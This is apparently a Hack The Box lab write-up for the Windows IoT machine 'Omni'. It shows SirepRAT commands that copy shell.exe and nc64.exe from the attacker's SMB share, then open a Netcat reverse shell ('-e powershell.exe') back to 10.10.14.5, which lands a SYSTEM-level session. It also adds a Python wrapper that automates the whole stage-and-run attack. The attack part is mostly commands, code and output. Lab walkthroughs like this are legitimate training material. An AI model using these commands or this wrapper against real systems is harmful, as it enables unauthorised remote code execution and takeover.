Exploit (SirepRAT)
File download, upload and command execution are all possible on the target through the SirepRAT exploit.
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ simplesmb . -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Starting an SMB server on Kali to host the payload.
Fail
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy \\\\10.10.14.5\\smb\\shell.exe C:\\shell.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
Executing the exploit script to deliver the payload to the target system over SMB.
The --return_output flag displays the output of the entered command, although the way it is printed is slightly broken: the stream payloads come back as a raw bytes repr rather than as text.
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\\shell.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
I tried executing the payload, but nothing showed up on the local Netcat listener. It may be due to AV, or to the fact that the platform differs from a regular Windows install, as this is likely Windows IoT.
Success
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy \\\\10.10.14.5\\smb\\nc64.exe C:\\nc64.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
Trying again with a Netcat binary instead. It is copied to the root of the system drive, so it will be available as C:\nc64.exe.
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\\nc64.exe" --args " 10.10.14.5 9999 -e powershell.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
Executing a Netcat reverse shell through the exploit script. Only the HResult comes back this time, with no output or error stream, because nc64.exe does not exit while the shell is connected.
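As an added example, not code from the original write-up or from SirepRAT itself: a small Python wrapper around the two steps above (stage the binary over SMB with cmd.exe /c copy, then launch it). It builds the SirepRAT argv as a list, so the backslashes in the UNC path need none of the doubled escaping the interactive shell command needs, and it parses SirepRAT's printed result lines into real bytes so the copy can be verified before anything is executed, rather than by reading the repr by eye. The result-line format is the one SirepRAT printed above, and the attacker and target addresses are the ones used on this page; the failed-copy sample is constructed for illustration and was not observed on the box.

```python
"""Wrapper for the SirepRAT stage-and-run flow (added example, not part of SirepRAT)."""
import ast
import re
import subprocess
from dataclasses import dataclass, field
from typing import List, Optional

SIREPRAT = "SirepRAT.py"                 # assumed: run from inside the SirepRAT checkout
CMD_EXE = r"C:\Windows\System32\cmd.exe"

# One SirepRAT result line, e.g.
# <OutputStreamResult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
_LINE = re.compile(r"^<(?P<kind>\w+) \| type: \d+, payload length: \d+, (?P<rest>.*)>$")
_HRESULT = re.compile(r"^HResult: (0x[0-9A-Fa-f]+)$")
_PEEK = re.compile(r"^payload peek: '(?P<repr>b'.*')'$")  # the peek is a Python bytes repr


def build_copy_args(lhost: str, share: str, filename: str, dest: str) -> str:
    """cmd.exe argument string that pulls a file from our SMB share onto the target.

    Handed to subprocess as a list element, so there is no second escaping layer:
    one backslash in the result is one backslash on the wire. The leading space
    mirrors the way SirepRAT is invoked on this page.
    """
    return r" /c copy \\{}\{}\{} {}".format(lhost, share, filename, dest)


def sirep_argv(target: str, cmd: str, args: Optional[str] = None) -> List[str]:
    """argv for SirepRAT's LaunchCommandWithOutput, as used in the write-up."""
    argv = ["python3", SIREPRAT, target, "LaunchCommandWithOutput",
            "--return_output", "--cmd", cmd]
    if args is not None:
        argv += ["--args", args]
    return argv


@dataclass
class SirepResult:
    hresult: Optional[int] = None
    stdout: Optional[bytes] = None   # None when no OutputStreamResult came back at all
    stderr: Optional[bytes] = None
    unparsed: List[str] = field(default_factory=list)

    @property
    def ok(self) -> bool:
        # S_OK and nothing on the error stream (an empty stream is shown as four NUL bytes)
        return self.hresult == 0 and not (self.stderr or b"").strip(b"\x00")


def parse_output(text: str) -> SirepResult:
    """Turn SirepRAT's printed result lines into bytes that can be tested."""
    res = SirepResult()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _LINE.match(line)
        if not m:
            res.unparsed.append(line)
            continue
        kind, rest = m["kind"], m["rest"]
        if kind == "HResultResult":
            h = _HRESULT.match(rest)
            if h:
                res.hresult = int(h.group(1), 16)
            continue
        p = _PEEK.match(rest)
        if not p:
            res.unparsed.append(line)
            continue
        payload = ast.literal_eval(p["repr"])  # "b'...'" -> bytes, with \r\n and \x00 decoded
        if kind == "OutputStreamResult":
            res.stdout = payload
        elif kind == "ErrorStreamResult":
            res.stderr = payload
    return res


def run_sirep(target: str, cmd: str, args: Optional[str] = None) -> SirepResult:
    proc = subprocess.run(sirep_argv(target, cmd, args), capture_output=True, text=True)
    return parse_output(proc.stdout)


def stage_and_run(target: str, lhost: str, share: str, filename: str,
                  dest: str, run_args: str) -> SirepResult:
    r"""Step 1: copy from \\lhost\share and refuse to go on unless cmd.exe confirmed it.
    Step 2: launch the staged binary (for nc -e only the HResult comes back, as above)."""
    staged = run_sirep(target, CMD_EXE, build_copy_args(lhost, share, filename, dest))
    if not staged.ok or b"1 file(s) copied" not in (staged.stdout or b""):
        raise RuntimeError(f"staging {dest} failed: {staged}")
    return run_sirep(target, dest, run_args)


# The three result lines SirepRAT printed for the copy step above, verbatim.
SAMPLE_COPY_OUTPUT = r"""<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
"""
# What the nc64.exe launch printed: the HResult only, since nc never returns.
SAMPLE_EXEC_OUTPUT = "<HResultResult | type: 1, payload length: 4, HResult: 0x0>\n"
# Constructed, not observed on the box: a copy whose error landed on the error stream.
SAMPLE_FAIL_OUTPUT = r"""<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<ErrorStreamResult | type: 12, payload length: 37, payload peek: 'b'The network path was not found.\r\n''>
"""

if __name__ == "__main__":
    # Offline run on the captured output. A live run would be:
    # stage_and_run("10.10.10.204", "10.10.14.5", "smb", "nc64.exe", r"C:\nc64.exe",
    #               " 10.10.14.5 9999 -e powershell.exe")
    print(parse_output(SAMPLE_COPY_OUTPUT))
    print("constructed failure ok?", parse_output(SAMPLE_FAIL_OUTPUT).ok)
```

The point of checking for "1 file(s) copied" before launching is the failure seen earlier on this page: a silent HResult of 0x0 from the launch step tells you nothing about whether the binary ever arrived or ran, so the staging step is the one place where cmd.exe's own output gives a definite answer.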
┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49672
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> whoami
whoami : The term 'whoami' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or
if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ whoami
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (whoami:String) [], CommandNotFo
undException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\windows\system32> cmd /c echo %username%
omni$
PS C:\windows\system32> hostname
omni
PS C:\windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a8
IPv6 Address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
Temporary IPv6 Address. . . . . . : dead:beef::f443:5df:b248:953c
Link-local IPv6 Address . . . . . : fe80::f178:17b1:199:4ce4%4
IPv4 Address. . . . . . . . . . . : 10.10.10.204
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
10.10.10.2
Initial foothold established on the target system as the omni$ user.
Notice that the whoami.exe binary is not available. This is definitely not a regular Windows desktop or server install, so expect other familiar binaries to be missing as well.
It would also appear that the current user is the machine account, hence the trailing $ sign. That is exactly what Windows reports in %username% for a process running as LocalSystem (NT AUTHORITY\SYSTEM), and SirepRAT executes commands as SYSTEM, so this shell is already running at the highest local privilege rather than as a service account. When whoami is missing, PowerShell's own .NET identity API, WindowsIdentity.GetCurrent, confirms the identity.